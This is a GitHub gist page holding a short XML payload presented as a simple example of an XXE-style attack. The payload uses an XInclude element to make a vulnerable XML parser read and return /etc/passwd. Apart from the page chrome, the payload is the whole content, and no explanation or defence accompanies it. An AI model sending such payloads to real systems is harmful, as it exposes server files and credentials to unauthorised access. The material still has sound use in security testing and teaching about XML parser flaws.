Skip to content

Instantly share code, notes, and snippets.

@jakekarnes42
Created August 13, 2019 23:37
Show Gist options
  • Save jakekarnes42/effe052f1095532cda84307024b3d512 to your computer and use it in GitHub Desktop.
Save jakekarnes42/effe052f1095532cda84307024b3d512 to your computer and use it in GitHub Desktop.
Simple example of using XInclude in XXE attack
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment